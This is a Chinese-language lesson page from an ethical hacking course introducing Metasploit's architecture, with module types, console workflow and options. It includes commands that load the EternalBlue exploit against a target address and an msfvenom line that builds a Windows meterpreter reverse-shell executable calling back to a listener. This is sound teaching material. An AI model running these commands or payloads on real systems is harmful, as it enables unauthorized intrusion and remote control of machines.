Metasploit 架构
模块与控制台
Metasploit 架构 是 CoddyKit 上的免费 Ethical Hacking Academy 课时。 这是第 1 节课,共 4 节。 你可以在下方免费阅读本课时的完整内容 — 然后在浏览器中使用内置代码编辑器和全天候 AI 导师进行实践。 这是 Ethical Hacking Academy 学习路径的一部分,你的进度在网页和 CoddyKit 应用中同步。 Ethical Hacking Academy 课程共包含 4 节课。
什么是 Metasploit?
Metasploit 是使用最广泛的漏洞利用框架。它提供结构化的漏洞利用代码、有效载荷和工具库,用于在获得授权的行动中测试和演示漏洞。
您不必从头编写每一种攻击,而是可以加载经过验证的模块,完成配置,然后通过统一的接口运行它们。
msfconsole
主要接口是 msfconsole,一种交互式命令行 Shell。它提供 Tab 补全、命令历史记录以及对所有模块的访问。
您可以从终端启动它,然后完全在其提示符中进行操作。
msfconsole
# msf6 > help模块类型
Metasploit 将功能组织为模块类型:
- 漏洞利用:利用漏洞的代码。
- 有效载荷:漏洞利用成功后在目标上运行的代码。
- 辅助模块:扫描器、模糊测试器以及不会传送有效载荷的工具。
- 后渗透:在遭入侵主机上执行的后续操作。
- 编码器和空操作模块:帮助有效载荷规避检测。
模块命名
模块使用分层路径,能够准确说明其功能。读取路径即可看出模块类型、平台和目标服务。
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit漏洞利用与有效载荷
一个重要区别是:
- 漏洞利用是进入目标的途径;它会破坏存在漏洞的软件。
- 有效载荷是进入目标后希望发生的事情,例如打开 Shell。
您需要将两者配对:根据目标和您的目的,一个漏洞利用可以传送许多不同的有效载荷。
模块工作流程
使用任何模块都遵循可重复的流程:
- 搜索模块。
- 使用模块以加载它。
- 设置诸如 RHOSTS 和 LHOST 之类的选项。
- 运行或执行漏洞利用。
正是这种一致性,使该框架能够扩展到数千个模块。
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit数据存储区与选项
模块设置保存在数据存储区中。每个选项都可能是必需的,也可能是可选的。
- RHOSTS:远程目标地址。
- RPORT:远程端口。
- LHOST:用于反向连接的监听地址。
- LPORT:用于监听的端口。
运行前使用 show options 查看模块所需的内容。
数据库
Metasploit 集成了 PostgreSQL 数据库,用于存储在行动期间发现的主机、服务、战利品和凭据。这样可以高效地跟踪较大的范围。
请在启动控制台之前启动数据库,以便自动记录结果。
msfdb init
# Inside msfconsole:
# db_status hosts services creds辅助模块
辅助模块可以在不利用漏洞的情况下执行有用工作,包括端口扫描、服务枚举、登录暴力破解和模糊测试。
它们通常是您的第一步,用于收集在选择漏洞利用模块之前所需的情报。
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom 是一个配套工具,用于将独立的有效载荷生成为文件:可执行文件、脚本或 Shellcode,之后可在控制台之外传送这些文件。
它将有效载荷生成和编码合并为一条命令,适用于网络钓鱼模拟或在获得授权的测试中进行自定义传送。
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe工作区
对于多个行动,Metasploit 的工作区会将每个客户的主机、服务和战利品隔离存储在数据库中。您可以在工作区之间切换,使数据不会在不同评估之间相互混淆。
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list all快速检查
检验您对模块类型的理解。
回顾
您已经了解了 Metasploit 的架构:
- msfconsole 是主要接口;msfvenom 用于构建独立的有效载荷。
- 模块类型包括:漏洞利用、有效载荷、辅助模块、后渗透、编码器/空操作模块。
- 模块路径编码了模块类型、平台和服务。
- 工作流程是:搜索、使用、设置选项、运行;设置保存在数据存储区中。
- PostgreSQL 数据库会跟踪主机、服务和战利品。
接下来:有效地搜索和使用漏洞利用模块。
常见问题解答
「Metasploit 架构」课时是免费的吗?
是的 — 「Metasploit 架构」的完整文本可在网页上免费阅读。要进行交互式练习(内置代码编辑器和全天候 AI 导师)并解锁 Ethical Hacking Academy 课程的其余内容,请升级到 CoddyKit PRO。 Ethical Hacking Academy 课程共包含 4 节课。
「Metasploit 架构」这节课中我会学到什么?
模块与控制台 你通过在浏览器中直接运行的动手代码来练习 Ethical Hacking Academy,全天候 AI 导师会在你学习这节课的过程中回答你的问题。
学习 Ethical Hacking Academy 需要有经验吗?
无需任何先前经验。CoddyKit 上的 Ethical Hacking Academy 课程适合初学者到高级学习者,你可以从这里开始或从头开始,按照自己的节奏学习。 这是第 1 节课,共 4 节。
「Metasploit 架构」课时需要多长时间?
大多数 CoddyKit 课程大约需要 5–10 分钟。每节课都很精短且互动,所以你能稳步进步,并在网页和应用中从离开的地方继续。
我能在这节 Ethical Hacking Academy 课中编写并运行代码吗?
能。每节 Ethical Hacking Academy 课都包含内置代码编辑器,你可以在浏览器中直接编写并运行真实代码,并获得即时 AI 反馈 — 无需本地设置。
此课程中的所有课时
- Metasploit 架构
- 搜索并使用漏洞利用程序
- 有效载荷与 Meterpreter
- 漏洞利用后模块